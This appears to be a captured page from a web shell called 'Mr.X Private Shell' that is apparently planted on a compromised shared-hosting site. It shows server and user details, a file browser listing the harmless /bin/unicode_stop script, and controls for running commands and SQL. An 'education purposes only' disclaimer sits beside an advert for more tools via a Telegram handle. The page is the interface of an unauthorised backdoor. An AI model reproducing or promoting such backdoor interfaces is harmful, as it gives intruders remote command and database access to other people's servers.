Uname: Linux 50-6-4-53.bluehost.com 5.14.0-611.41.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 19 03:50:11 EDT 2026 x86_64
User: 1011 (dccreditrepairto)
Group: 1010 (dccreditrepairto)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//bin/      ( Reset | Go to )
File Name: unicode_stop
#!/usr/bin/sh

TTY="`/usr/bin/tty`"
case "$TTY" in
    /dev/console|/dev/vc*|/dev/tty[0-9]*)
        ;;
    *)
        echo "unicode_stop skipped on $TTY"
        exit 0
        ;;
esac

# stop unicode
kbd_mode -a
if test -t ; then
    printf '\033%%@'
fi
stty -iutf8

uid="`id -u 2>/dev/null`" ||:
if [ "$uid" = '0' ]; then
    [ ! -r "$HOME/.kbd/.keymap_sv" ] ||
        loadkeys "$HOME/.kbd/.keymap_sv"
fi

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL